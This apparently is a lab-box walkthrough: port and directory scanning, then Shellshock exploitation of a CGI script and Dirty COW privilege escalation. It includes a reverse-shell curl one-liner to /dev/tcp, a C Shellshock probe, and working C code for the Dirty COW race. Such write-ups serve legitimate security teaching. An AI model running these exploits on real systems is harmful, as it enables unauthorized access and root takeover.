Alright! Another day, another box! Let’s hit it with nmap.
kali@kali:~/work$ nmap -p- target
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:46 MDT
Nmap scan report for target (work)
Host is up (0.068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 48.97 seconds
Cool cool. Nothing obvious on HTTP, and OpenSSH is an extremely old version.
After a lot of effort that goes nowhere, we decide to give HTTP a second look.
kali@kali:~/work$ gobuster dir -u http://target/cgi-bin -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://target/cgi-bin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 286]
/.htaccess (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 291]
/test (Status: 200) [Size: 14]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
This is a lesson learned the hard way. Always enumerate the well-known subdirectories (/cgi-bin/ above all) even when a request for the directory itself comes back as an error. Apache's ScriptAlias maps /cgi-bin/ to /usr/lib/cgi-bin/ with no index to serve, so the directory looks dead while the scripts underneath it are very much alive.
kali@kali:~/work$ curl http://target/cgi-bin/test
CGI Default !
Okay, a live CGI script. Let's try Shellshock (CVE-2014-6271) in the User-Agent: Apache exports request headers into the script's environment (HTTP_USER_AGENT here), and an unpatched bash executes whatever trails a function definition in any environment variable it imports, before the script itself even runs.
kali@kali:~/work$ curl -A "() { :;}; /bin/bash -i > /dev/tcp/me/4444 0<&1 2>&1" http://target/cgi-bin/test
Boom, shell. The listener catches it:
kali@kali:~/work$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on target 47561
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
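Before throwing a reverse shell at a host you only suspect is vulnerable, a harmless probe is worth the thirty seconds: the same "() { :;}; " prefix, but a trailing command that just echoes a marker back into the HTTP response. Here is that probe in C, an example added for this write-up and not the original author's code. The marker string is made up, the host/port/path come from the command line, and the Content-Type trick is there so Apache accepts the injected output as a valid CGI response instead of returning a 500.

```c
#define _GNU_SOURCE
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Constructed token; anything unlikely to appear in a normal page works. */
#define MARKER "SHOCK-MARKER-7f3a"

/* Build the benign test payload. "() { :;}; " is the function definition that
 * unpatched bash keeps parsing past; everything after it runs when the CGI
 * script's bash starts. Emitting a header and a blank line first means the
 * marker lands in the body rather than tripping Apache's header parser. */
int build_payload(char *out, size_t outlen, const char *marker)
{
    int n = snprintf(out, outlen,
                     "() { :;}; echo Content-Type: text/plain; echo; echo %s", marker);
    return n > 0 && (size_t)n < outlen;
}

/* Hit if the marker appears anywhere in the raw response: body normally, or
 * the header block if a payload without the Content-Type trick is used. */
int response_has_marker(const char *response, size_t len, const char *marker)
{
    return memmem(response, len, marker, strlen(marker)) != NULL;
}

/* One GET with the payload in User-Agent (the header the post uses) and in
 * Referer, since both are exported into the CGI environment.
 * Returns 1 if the marker came back, 0 if not, -1 on a transport error. */
int probe(const char *host, const char *port, const char *path)
{
    char payload[256], req[1024], resp[65536];
    if (!build_payload(payload, sizeof payload, MARKER))
        return -1;

    struct addrinfo hints, *ai;
    memset(&hints, 0, sizeof hints);
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &ai) != 0)
        return -1;
    int fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
    if (fd < 0 || connect(fd, ai->ai_addr, ai->ai_addrlen) < 0) {
        freeaddrinfo(ai);
        return -1;
    }
    freeaddrinfo(ai);

    int n = snprintf(req, sizeof req,
        "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nReferer: %s\r\n"
        "Connection: close\r\n\r\n", path, host, payload, payload);
    if (n <= 0 || (size_t)n >= sizeof req || write(fd, req, n) != n) {
        close(fd);
        return -1;
    }

    size_t total = 0;
    ssize_t r;
    while (total < sizeof resp - 1 &&
           (r = read(fd, resp + total, sizeof resp - 1 - total)) > 0)
        total += (size_t)r;
    close(fd);
    resp[total] = '\0';
    return response_has_marker(resp, total, MARKER);
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s host port /cgi-bin/script\n", argv[0]);
        return 2;
    }
    int v = probe(argv[1], argv[2], argv[3]);
    if (v < 0) {
        fprintf(stderr, "connection failed\n");
        return 2;
    }
    puts(v ? "VULNERABLE: marker echoed back by the CGI" : "no marker in response");
    return v ? 0 : 1;
}
```

Build it with 'gcc -o shockcheck shockcheck.c' and run './shockcheck target 80 /cgi-bin/test'; exit status 0 means the marker came back and the reverse-shell payload above will work, while a clean "no marker" on a plain 200 is a strong sign bash is patched (or the script is not bash at all).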
One of the first things you'll see hackers do on a new system is run 'uname -a' to see what kernel version they're dealing with. Let's copy them.
www-data@ubuntu:/usr/lib/cgi-bin$ uname -a
uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Alright, that's an April 2012 Ubuntu 12.04 kernel, and looking it up, it sits squarely in the Dirty COW range.
Dirty COW (CVE-2016-5195) is a race condition in the Linux kernel's copy-on-write handling of private file mappings, present from 2.6.22 up to 4.8.3 (distro backports muddy the exact cutoff, so treat the version string as a hint rather than proof). Win the race and a write through /proc/self/mem into a read-only, MAP_PRIVATE mapping lands in the file's page cache instead of your private copy, which amounts to an unprivileged write into any file you can open, SUID binaries included. To exploit this, I've written some code found at https://github.com/NekointheShell/exploits/blob/main/linux/2.6.22-4.8.3/privesc/dirtycow.c, heavily based on 40616 from exploit-db. Read it. Mine has comments to tell you what's going on. Compile it with 'gcc -static dirtycow.c -o dirtycow' (add -pthread if your toolchain complains about pthread_create), copy it to the box, then run it with a SUID binary as its argument. Since it overwrites that binary's pages, pick a target you can afford to lose and put the original back once you have root.
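Because fixes get backported without the version changing, the honest check is to run the primitive against a throwaway file before pointing it at a SUID binary: map a file you can only read as MAP_PRIVATE, then race madvise(MADV_DONTNEED) against a write through /proc/self/mem, and see whether a fresh read of the file shows your bytes. The following is an example added for this write-up, not the linked dirtycow.c or exploit-db 40616; the release-window triage function and the 50-million-attempt budget are choices made here, and the payload is limited to 255 bytes at offset 0 purely to keep the check simple.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Coarse triage for a "3.2.0-23-generic" style release: inside 2.6.22..4.8.3?
 * Distros backport fixes, so a hit means "run the race below", not "vulnerable". */
int release_in_dirtycow_window(const char *release)
{
    int maj = 0, min = 0, pat = 0;
    if (sscanf(release, "%d.%d.%d", &maj, &min, &pat) < 2)
        return 0;
    long v = (long)maj * 1000000L + min * 1000L + pat;
    return v >= 2006022L && v <= 4008003L;
}

static void *map;              /* MAP_PRIVATE, PROT_READ view of the target file */
static size_t map_len;
static const char *payload;    /* bytes we try to plant at file offset 0 */
static volatile int done;

/* Thread A: keep discarding the private COW copy of the page so that every
 * write below is forced back through the kernel's fault path. */
static void *madvise_thread(void *unused)
{
    (void)unused;
    while (!done)
        madvise(map, map_len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write through /proc/self/mem, which ignores the PROT_READ mapping
 * permission. In the buggy window between "COW copy made" and "page table
 * updated", the write goes to the file's page-cache page instead. */
static void *procselfmem_thread(void *arg)
{
    int target_fd = *(int *)arg;
    int mem = open("/proc/self/mem", O_RDWR);
    size_t plen = strlen(payload);
    char check[256];
    if (mem < 0) { done = 1; return NULL; }
    for (long i = 0; i < 50000000L && !done; i++) {   /* attempt budget chosen here */
        lseek(mem, (off_t)(uintptr_t)map, SEEK_SET);
        ssize_t w = write(mem, payload, plen);
        (void)w;
        if ((i & 0xffff) == 0 &&                       /* every 65536 tries, re-read the real file */
            pread(target_fd, check, plen, 0) == (ssize_t)plen &&
            memcmp(check, payload, plen) == 0)
            done = 1;
    }
    done = 1;
    close(mem);
    return NULL;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <file you can read but not write> <new content>\n", argv[0]);
        return 2;
    }
    payload = argv[2];
    int fd = open(argv[1], O_RDONLY);
    struct stat st;
    if (fd < 0 || fstat(fd, &st) < 0) { perror(argv[1]); return 2; }
    size_t plen = strlen(payload);
    if (plen == 0 || plen >= 256 || (off_t)plen > st.st_size) {
        fprintf(stderr, "payload must be 1..255 bytes and fit inside the file\n");
        return 2;
    }
    map_len = (size_t)st.st_size;
    map = mmap(NULL, map_len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 2; }

    pthread_t a, b;
    pthread_create(&a, NULL, madvise_thread, NULL);
    pthread_create(&b, NULL, procselfmem_thread, &fd);
    pthread_join(b, NULL);
    pthread_join(a, NULL);

    char check[256];
    if (pread(fd, check, plen, 0) == (ssize_t)plen && memcmp(check, payload, plen) == 0) {
        puts("VULNERABLE: our bytes are now in the read-only file's page cache");
        return 0;
    }
    puts("no corruption seen: patched kernel, or the race did not win within budget");
    return 1;
}
```

Run it as the unprivileged user against a scratch file you own but have made read-only ('echo AAAAAAAAAAAA > /tmp/cow; chmod 444 /tmp/cow; ./cowcheck /tmp/cow ZZZZ'); on a vulnerable kernel it usually reports within a few seconds, on a patched one it grinds through the budget and exits 1. Note the corrupted page lives in the page cache and is not marked dirty, so it may never reach disk, which is exactly why the real exploit works on a SUID binary without touching the filesystem and why restoring the target afterwards matters.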
And like that, we’ve rooted yet another box.